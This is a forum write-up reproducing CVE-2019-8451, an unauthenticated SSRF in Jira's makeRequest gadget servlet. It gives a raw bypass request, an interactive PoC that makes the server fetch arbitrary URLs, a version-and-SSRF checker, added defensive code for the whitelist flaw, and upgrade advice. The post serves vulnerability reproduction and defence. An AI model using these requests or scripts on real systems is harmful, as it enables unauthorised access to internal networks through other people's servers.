Title: Jira unauthenticated SSRF vulnerability reproduction (CVE-2019-8451)

taibeihacker

Moderator

0x00 Vulnerability background

The /plugins/servlet/gadgets/makeRequest resource in Jira has an SSRF vulnerability caused by a logic defect in the JiraWhitelist class. A remote attacker who exploits it can reach internal network resources with the identity of the Jira server. Analysis shows that the vulnerability can be triggered without any credentials. The payload used below places the Jira base URL before an `@`, so the whitelist accepts the value, while the HTTP client treats everything before the `@` as userinfo and connects to the host that follows it.

0x01 Affected versions

Jira Server 7.6.0 up to, but not including, 7.13.9, and 8.0.0 up to, but not including, 8.4.0.
The vulnerability was introduced in Jira Server 7.6.0 and fixed in 7.13.9 and 8.4.0.

0x02 Reproduction

Atlassian JIRA v7.13.0 is used as the example here (this version is vulnerable). Download address:
The installation is not described here (follow the installer prompts; register an account on the Atlassian site first to obtain a trial licence key, then install).
Send the following request through Burp Suite; the response shows that the target is vulnerable to SSRF (<ssrf-target> stands for the external host you want the Jira server to fetch):
GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@<ssrf-target>/ HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close
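To make the bypass in the request above concrete, here is an added example (not code from the original post, and not Jira's JiraWhitelist source) that models the class of check the page describes: a check on the URL string that accepts anything beginning with the Jira base URL, placed beside a hardened check that compares the parsed scheme, host and port and refuses userinfo. The base URL 10.206.1.8:8080 and the sample URLs are assumptions taken from the lab setup and constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Model of the makeRequest whitelist bypass: a check on the URL *string*
accepts the payload, while the HTTP client, parsing the same string as a URL,
connects somewhere else."""
from urllib.parse import urlsplit

# Jira base URL from the lab setup above (assumed; change for your target).
JIRA_BASE_URL = "http://10.206.1.8:8080"
DEFAULT_PORTS = {"http": 80, "https": 443}


def weak_whitelist_check(base_url: str, requested: str) -> bool:
    """Flawed logic (a model, not Jira's source): "does the requested URL
    start with the Jira base URL?" A string prefix says nothing about the
    authority an HTTP client will extract from the URL."""
    return requested.startswith(base_url)


def connection_target(requested: str):
    """(hostname, port) an RFC 3986 client actually connects to, or None if
    the authority cannot be parsed (e.g. a non-numeric port)."""
    parts = urlsplit(requested)
    try:
        port = parts.port  # raises ValueError when the port is not an integer
    except ValueError:
        return None
    if parts.hostname is None:
        return None
    return parts.hostname, port or DEFAULT_PORTS.get(parts.scheme)


def strict_whitelist_check(base_url: str, requested: str) -> bool:
    """Hardened logic: compare parsed scheme, host and port, and refuse any
    userinfo, because "<base>@<other-host>" is exactly the bypass."""
    base, req = urlsplit(base_url), urlsplit(requested)
    if req.username is not None or req.password is not None:
        return False
    if req.scheme != base.scheme:
        return False
    target = connection_target(requested)
    return target is not None and target == connection_target(base_url)


def classify(requested: str, base_url: str = JIRA_BASE_URL) -> dict:
    """Side-by-side verdict of both checks plus where the request really goes."""
    return {
        "weak_allows": weak_whitelist_check(base_url, requested),
        "strict_allows": strict_whitelist_check(base_url, requested),
        "connects_to": connection_target(requested),
    }


# Constructed inputs: the page's payload shape plus controls.
SAMPLES = [
    "http://10.206.1.8:8080/rest/api/2/serverInfo",  # legitimate same-origin URL
    "http://10.206.1.8:8080@example.com/",           # CVE-2019-8451 payload shape
    "http://10.206.1.8:8080.attacker.example/",      # prefix matches, port unparsable
    "http://example.com/",                           # plainly external
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(f"{url:<46} {classify(url)}")
```

The payload-shaped URL is the interesting row: the weak check allows it, yet `urlsplit` reports `10.206.1.8` and `8080` as username and password and `example.com` as the host, which is where the server's outbound request goes. The hardened check rejects it on the userinfo alone, and also rejects URLs whose authority cannot be parsed rather than guessing.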

0x03 Verification

The verification PoC is as follows (ported to Python 3; it takes the Jira base URL as its first argument):
import sys

import requests

# Request shape (see vuln_url below): <jira>/plugins/servlet/gadgets/makeRequest?url=<jira>@<ssrf-target>/


def ssrf_poc(url, ssrf_url):
    url = url.rstrip('/')
    # The Jira base URL sits before the '@' so the whitelist accepts the value;
    # the HTTP client treats it as userinfo and connects to ssrf_url instead.
    vuln_url = url + '/plugins/servlet/gadgets/makeRequest?url=' + url + '@' + ssrf_url
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'X-Atlassian-Token': 'no-check',
        'Connection': 'close'
    }
    r = requests.get(url=vuln_url, headers=headers)
    # The makeRequest reply carries the fetched response in its body, so a
    # 'set-cookie' there means the outbound request reached a host that set a cookie.
    if r.status_code == 200 and 'set-cookie' in r.text:
        print('\nSend poc Success!\n')
        # Jira reports the acting user here; 'anonymous' shows no credentials were needed.
        print('X-AUSERNAME=%s' % r.headers.get('X-AUSERNAME'))
        print('\nvuln_url=' + vuln_url + '\n')
        print(r.text)
    else:
        print('No Vuln Exit!')


if __name__ == '__main__':
    # Target Jira base URL: first command-line argument, or edit the default below.
    url = sys.argv[1] if len(sys.argv) > 1 else 'http://10.206.1.8:8080'
    while True:
        print()
        ssrf_url = input('SSRF URL: ')
        ssrf_poc(url, ssrf_url)
python CVE-2019-8451.py http://10.206.1.8:8080/

Or:
#!/usr/bin/env python3
import argparse
import re
import sys

import requests

G, B, R, W, M, C, end = '\033[92m', '\033[94m', '\033[91m', '\x1b[37m', '\x1b[35m', '\x1b[36m', '\033[0m'
info = end + W + '[-]' + W
good = end + G + '[+]' + C
bad = end + R + '[' + W + '!' + R + ']'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36'

# Boundaries from the advisory: introduced in 7.6.0, fixed in 7.13.9 and 8.4.0.
VULNERABLE_RANGES = [((7, 6, 0), (7, 13, 9)), ((8, 0, 0), (8, 4, 0))]


def version_tuple(v):
    return tuple(int(x) for x in v.split('.'))


def is_vulnerable_version(v):
    """True when v lies in [introduced, fixed) on either release line."""
    t = version_tuple(v)
    return any(lo <= t < hi for lo, hi in VULNERABLE_RANGES)


def check_version(url):
    response = send_request(url)
    print(info + ' Checking for version.' + end)
    # Jira's application-name meta tag carries data-version="x.y.z"; fall back to the
    # first x.y.z anywhere in the page. A single-digit pattern cannot match e.g. 7.13.0.
    m = re.search(r'data-version="([0-9]+\.[0-9]+\.[0-9]+)"', response) or \
        re.search(r'([0-9]+\.[0-9]+\.[0-9]+)', response)
    if not m:
        print(bad + ' Could not find a version string in the response.' + end)
        return
    version = m.group(1)
    print(info + ' Jira version appears to be: ' + version + end)
    if is_vulnerable_version(version):
        print(good + ' Version seems to indicate it might be vulnerable!' + end)
    else:
        print(bad + " Version seems to indicate it's probably not vulnerable." + end)


def check_vuln(url):
    # The Jira base URL before '@' satisfies the whitelist; the outbound
    # request actually goes to example.com.
    target = url + '/plugins/servlet/gadgets/makeRequest?url=' + url + '@example.com/'
    response = send_request(target)
    print(info + ' Sending SSRF test.' + end)
    if '"rc":200' in response and 'Example Domain' in response:
        print(good + ' Host appears to be vulnerable! ' + end)
    else:
        print(bad + " Host doesn't appear to be vulnerable." + end)


def send_request(target):
    headers = {'X-Atlassian-Token': 'no-check', 'User-Agent': user_agent}
    try:
        r = requests.get(target, headers=headers)
    except requests.RequestException as e:
        print(bad + ' Problem with request! ' + end)
        print(e)
        sys.exit(1)
    if r.status_code != 200:
        print(info + ' Something went wrong! ' + end)
        if r.status_code == 302:
            print(bad + ' Redirected. Try this instead: ' + r.headers.get('Location', '') + end)
        else:
            print(bad + ' Status: ' + str(r.status_code) + end)
        sys.exit(1)
    return r.text


if __name__ == '__main__':
    parser = argparse.ArgumentParser(prog='jira-2019-8451.py',
                                     description='For checking if a Jira instance is vulnerable to CVE-2019-8451')
    parser.add_argument('-u', '--url', help="URL of the target Jira instance e.g. '-u https://localhost:8080'")
    parser.add_argument('-c', '--check', help="Only check the Jira version; doesn't send SSRF attempt", action='store_true')
    args = parser.parse_args()
    if not args.url:
        print(bad + ' Missing parameters ' + end)
        parser.print_help()
        sys.exit(1)
    url = str(args.url).rstrip('/')
    print(info + ' Testing ' + url + '.' + end)
    check_version(url)
    if not args.check:
        check_vuln(url)
Usage: pip3 install requests
$ ./jira-2019-8451.py -h
usage: jira-2019-8451.py [-h] [-u URL] [-c]

For checking if a Jira instance is vulnerable to CVE-2019-8451

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  URL of the target Jira instance e.g. '-u https://localhost:8080'
  -c, --check        Only check the Jira version; doesn't send SSRF attempt
D:\Python\Python37>python C:\Users\Administrator\Desktop\jira-2019-8451.py -u http://10.206.1.8:8080
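Both PoCs above decide by substring matching on the raw response: the first looks for 'set-cookie' in the body, the second for '"rc":200' together with 'Example Domain'. The following added example (not code from the original post or from Jira) parses the makeRequest envelope instead, so the verdict comes from the proxied fetch's own status code and body rather than from text that could also appear in a login page. It assumes the Shindig gadget-proxy response format: the anti-JSON-hijacking prefix `throw 1; < don't be evil' >` followed by a JSON object keyed by the fetched URL, whose value carries `rc`, `body` and `headers`; the sample responses are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Parse the makeRequest envelope instead of substring-matching the raw text."""
import json
from typing import Optional

# Anti-JSON-hijacking guard the gadget proxy prepends (assumed Shindig convention).
CRUFT_PREFIX = "throw 1; < don't be evil' >"


def parse_make_request(text: str) -> Optional[dict]:
    """Return {"url", "rc", "body", "headers"} for the single proxied fetch, or
    None when the text is not an envelope at all (e.g. a login page after a redirect)."""
    if text.startswith(CRUFT_PREFIX):
        text = text[len(CRUFT_PREFIX):]
    text = text.lstrip()
    if not text.startswith("{"):
        return None
    try:
        envelope = json.loads(text)
    except json.JSONDecodeError:
        return None
    if not isinstance(envelope, dict) or len(envelope) != 1:
        return None
    (url, result), = envelope.items()
    if not isinstance(result, dict) or "rc" not in result:
        return None
    return {
        "url": url,
        "rc": int(result["rc"]),
        "body": result.get("body", ""),
        # header names are normalised so a 'set-cookie' check is case-insensitive
        "headers": {k.lower(): v for k, v in result.get("headers", {}).items()},
    }


def ssrf_confirmed(text: str, marker: str) -> bool:
    """True when the proxied fetch reported HTTP 200 and its body carries the
    marker we expect from the outbound target ('Example Domain' for example.com)."""
    r = parse_make_request(text)
    return r is not None and r["rc"] == 200 and marker in r["body"]


# Constructed sample: a successful proxied fetch of example.com.
SAMPLE_OK = CRUFT_PREFIX + json.dumps({
    "http://example.com/": {
        "rc": 200,
        "body": "<html><head><title>Example Domain</title></head></html>",
        "headers": {"Content-Type": ["text/html; charset=UTF-8"], "Set-Cookie": ["a=b"]},
    }
})
# Constructed sample: the proxy reported a failed fetch (rc value chosen arbitrarily).
SAMPLE_FAILED = CRUFT_PREFIX + json.dumps(
    {"http://example.com/": {"rc": 502, "body": "", "headers": {}}}
)
# Constructed sample: an HTML page, which substring checks could misread.
SAMPLE_HTML = "<html><body>login page, not a makeRequest envelope</body></html>"

if __name__ == "__main__":
    for name, sample in (("ok", SAMPLE_OK), ("failed", SAMPLE_FAILED), ("html", SAMPLE_HTML)):
        print(name, ssrf_confirmed(sample, "Example Domain"), parse_make_request(sample))
```

With the parsed form, the first PoC's cookie test becomes `"set-cookie" in parse_make_request(text)["headers"]`, and the second's becomes `ssrf_confirmed(text, "Example Domain")`; anything that is not an envelope is reported as not confirmed instead of being scanned for coincidental substrings.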

0x04 Remediation

Upgrade to Jira Server 8.4.0 or later (or to 7.13.9 or later if you stay on the 7.13 line).
